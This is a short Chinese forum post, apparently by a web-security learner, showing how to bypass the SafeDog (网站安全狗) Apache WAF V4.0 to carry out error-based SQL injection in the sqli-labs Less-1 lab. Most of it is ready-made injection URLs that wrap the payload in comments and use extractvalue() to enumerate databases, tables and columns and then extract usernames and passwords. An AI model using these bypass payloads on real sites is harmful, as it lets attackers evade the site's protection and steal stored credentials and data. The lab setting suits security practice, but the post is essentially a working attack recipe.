本文作者:小右
作者寄语:练习时长两周半的web安全练习生
网站安全狗(Apache版)V4.0存在报错sql注入绕过 搭建环境:WIN10+apache+php7 软件获取: 实验:sqli-labs level1环境 测试环境是搭建成功: 查询数据库/Less-1/?=/*&id=-1' and extractvalue(1,concat(0x3e,(select schema_name from information_schema.schemata limit 14,1),0x3e))%23*/--+ 查询表/Less-1/?=/*&id=-1' and extractvalue(1,concat(0x3e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x3e))%23*/--+ 查询列 /Less-1/?=/*&id=-1' and extractvalue(1,concat(0x3e,(select group_concat(column_name) from information_schema.columns where table_name='user'),0x3e))%23*/--+ 查询数据
/Less-1/?=/*&id=-1' and extractvalue(1,concat(0x3e,(select concat(username,0x23,password) from security.users where id=3),0x3e))%23*/--+
| 
发表于 2020-3-13 12:44:40
